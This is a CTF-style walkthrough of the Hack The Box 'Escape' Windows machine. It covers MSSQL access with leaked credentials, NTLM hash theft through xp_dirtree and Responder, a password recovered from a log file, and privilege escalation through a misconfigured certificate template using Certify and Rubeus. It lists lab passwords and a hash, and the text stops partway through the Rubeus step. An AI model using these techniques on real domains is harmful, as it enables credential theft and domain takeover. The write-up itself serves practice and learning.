Medium windows box that includes stealing NTLM hash through mssql, passwords in logs files and privilege escalation via certificate template!
Credentials
Username
Password
Description
PublicUser
GuestUserCantWrite1
MS SQL password
sql_svc
REGGIE1234ronnie
AD Account responsible for running database server
ryan.cooper
NuclearMosquito3
Active directory user found in SQLServer logs
Administartor
A52F78E4C751E5F5E17E1E9F3E58F4EE
NTLM hash
Enumeration
Nmap Scan
โโโ(kaliใฟkali)-[~/Documents/CTFs/HTB_Escape]โโ$ sudo nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49710,49714,59666 -A -T4 10.10.11.202 -oA nmap_scan
StartingNmap7.93 ( https://nmap.org ) at 2023-06-04 13:23 EDTNmapscanreportfor10.10.11.202Hostisup (0.038s latency).PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus88/tcpopenkerberos-secMicrosoftWindowsKerberos (server time:2023-06-0501:23:05Z)135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|ssl-cert:Subject:commonName=dc.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:dc.sequel.htb|Notvalidbefore:2022-11-18T21:20:35|_Notvalidafter:2023-11-18T21:20:35|_ssl-date:2023-06-05T01:24:35+00:00; +7h59m23sfromscannertime.445/tcpopenmicrosoft-ds?464/tcpopenkpasswd5?593/tcpopenncacn_httpMicrosoftWindowsRPCoverHTTP1.0636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|ssl-cert:Subject:commonName=dc.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:dc.sequel.htb|Notvalidbefore:2022-11-18T21:20:35|_Notvalidafter:2023-11-18T21:20:35|_ssl-date:2023-06-05T01:24:35+00:00; +7h59m23sfromscannertime.1433/tcpopenms-sql-sMicrosoftSQLServer201915.00.2000.00; RTM|_ssl-date:2023-06-05T01:24:35+00:00; +7h59m23sfromscannertime.|ms-sql-ntlm-info:|10.10.11.202:1433:|Target_Name:sequel|NetBIOS_Domain_Name:sequel|NetBIOS_Computer_Name:DC|DNS_Domain_Name:sequel.htb|DNS_Computer_Name:dc.sequel.htb|DNS_Tree_Name:sequel.htb|_Product_Version:10.0.17763|ssl-cert:Subject:commonName=SSL_Self_Signed_Fallback|Notvalidbefore:2023-06-02T13:28:16|_Notvalidafter:2053-06-02T13:28:16|ms-sql-info:|10.10.11.202:1433:|Version:|name:MicrosoftSQLServer2019RTM|number:15.00.2000.00|Product:MicrosoftSQLServer2019|Servicepacklevel:RTM|Post-SPpatchesapplied:false|_TCPport:14333268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date:2023-06-05T01:24:35+00:00; +7h59m23sfromscannertime.|ssl-cert:Subject:commonName=dc.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:dc.sequel.htb|Notvalidbefore:2022-11-18T21:20:35|_Notvalidafter:2023-11-18T21:20:353269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date:2023-06-05T01:24:35+00:00; +7h59m23sfromscannertime.|ssl-cert:Subject:commonName=dc.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:dc.sequel.htb|Notvalidbefore:2022-11-18T21:20:35|_Notvalidafter:2023-11-18T21:20:355985/tcpopenhttpMicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)|_http-title:NotFound|_http-server-header:Microsoft-HTTPAPI/2.09389/tcpopenmc-nmf.NETMessageFraming49667/tcpopenmsrpcMicrosoftWindowsRPC49689/tcpopenncacn_httpMicrosoftWindowsRPCoverHTTP1.049690/tcpopenmsrpcMicrosoftWindowsRPC49710/tcpopenmsrpcMicrosoftWindowsRPC49714/tcpopenmsrpcMicrosoftWindowsRPC59666/tcpopenmsrpcMicrosoftWindowsRPCWarning:OSScanresultsmaybeunreliablebecausewecouldnotfindatleast1openand1closedportOSfingerprintnotidealbecause:MissingaclosedTCPportsoresultsincompleteNoOSmatchesforhostNetworkDistance:2hopsServiceInfo:Host:DC; OS:Windows; CPE:cpe:/o:microsoft:windowsHostscriptresults:|smb2-security-mode:|311:|_Messagesigningenabledandrequired|smb2-time:|date:2023-06-05T01:23:57|_start_date:N/A|_clock-skew:mean:7h59m23s,deviation:0s,median:7h59m22sTRACEROUTE (using port53/tcp)HOPRTTADDRESS139.26ms10.10.14.1239.43ms10.10.11.202OSandServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 100.96 seconds
SMB Shares
โโ$ smbclient -L //10.10.11.202
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
There is one non-default share Public after trying to connect to it there is PDF file.
โโ$ smbclient \\\\10.10.11.202\\Public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1394427 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (211.3 KiloBytes/sec) (average 211.3 KiloBytes/sec)
SQL Server Procedures.pdf
This pdf contain some information about connecting to SQL database without Active Directory account.
MS SQL
For connection to database I used impacket-mssql script
โโ$impacket-mssqlclientPublicUser:GuestUserCantWrite1@10.10.11.202Impacketv0.10.0-Copyright2022SecureAuthCorporation[*] Encryption required, switching to TLS[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.[*] ACK: Result: 1 - Microsoft SQL Server (1507208) [!] Press help for extra shell commands
Databases
SQL> SELECT name FROM master.dbo.sysdatabases;
name
--------
master
tempdb
model
msdb
master, tempdb, msdb are default databases used by mssql and to model table there is no permission for current user.
SQL> use model;
[-] ERROR(DC\SQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL>
Permissions
SQL> use master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
SQL> EXEC sp_helprotect 'xp_cmdshell';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_dirtree';
Owner Object Grantee Grantor ProtectType Action Column
------ -------------------- ------------ ------- ----------- -------------- ------
sys xp_dirtree public dbo b'Grant ' Execute .
SQL> EXEC sp_helprotect 'xp_subdirs';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_fileexist';
Owner Object Grantee Grantor ProtectType Action Column
------ ------------------------ ------------ ------- ----------- -------------- ------
sys xp_fileexist public dbo b'Grant ' Execute .
Current user can't execute xp_cmdshell - this allows running shell commands on database server directly through database.
But there is permission for xp_dirtree command and this can be used to steal NTLM hash of user that is running database server.
This should be also possible with xp_fileexist but I had no luck with that function.
Stealing NTLM hash
Setting up Responder
Responder is software that talk with most of the protocols it is focused on stealing hashes and credentials.
โโโ(kaliใฟkali)-[~/Documents/CTFs/HTB_Escape]
โโ$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.109]
Responder IPv6 [dead:beef:2::106b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-NCM14VQ3QD4]
Responder Domain Name [KHXV.LOCAL]
Responder DCE-RPC Port [47910]
[+] Listening for events...
So password for sql_svc account is REGGIE1234ronnie
Foothold
Acquired credentials have permissions to conect via remote access.
Enumeration
I have run winpeas but there is nothing special in there. So next step was manual enumeration.
As there was nothing in home direcotry of sql_svc user and SQLServer is only one non-default directory (because of running MS SQL server) I started looking around. Only semi-interesting file is ERRORLOG.BAK Located at C:\SQLServer\Logs
In there is password for user ryan.cooper
Log states Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Next entry is Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
NuclearMosquito3 looks like a password so this is propably a typo from user side and he type password in username field.
This was indeed password for ryan.cooper user and this allowed for login in his account
Privilege Escalation
I have ran winpeas again but no luck there. Additionaly I gathered information about domain with Sharphound to analyze permissions and connections in Bloodhound but again no luck.
But there is this trend in windows enviroment that switch for certificate authorization. There are many things that can go wrong e.g. certificate template with too wide permissions.
To certificate be vulnerable some specyfic flags need to be set:
msPKI-Certificate-Name-Flag set to ENROLLEE_SUPPLIES_SUBJECT this means that user requesting certificate can specify subject - effectively a user that will be authenticated
Access Rights needs to Allows Enroll to NT AUTHORITY\Authenticated Users this means any logged in user can request certificate
pkiextendedkeyusage needs to have set Client Authentication to allows impersonating another user
After converting certificate in PEM to right format with openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx as suggested in Certify output it need to be transfered back to windows box.
I did it by setting up python web server python -m http.server and downloading it on windows box IWR http://10.10.14.109:8000/cert.pfx -Outfile cert.pfx
With certificate on the disk next we need Rubeus to interact with Kerberos and request ticket for Administrator account using generated certificate.
asktgt mode responsible for requesting TGT tickests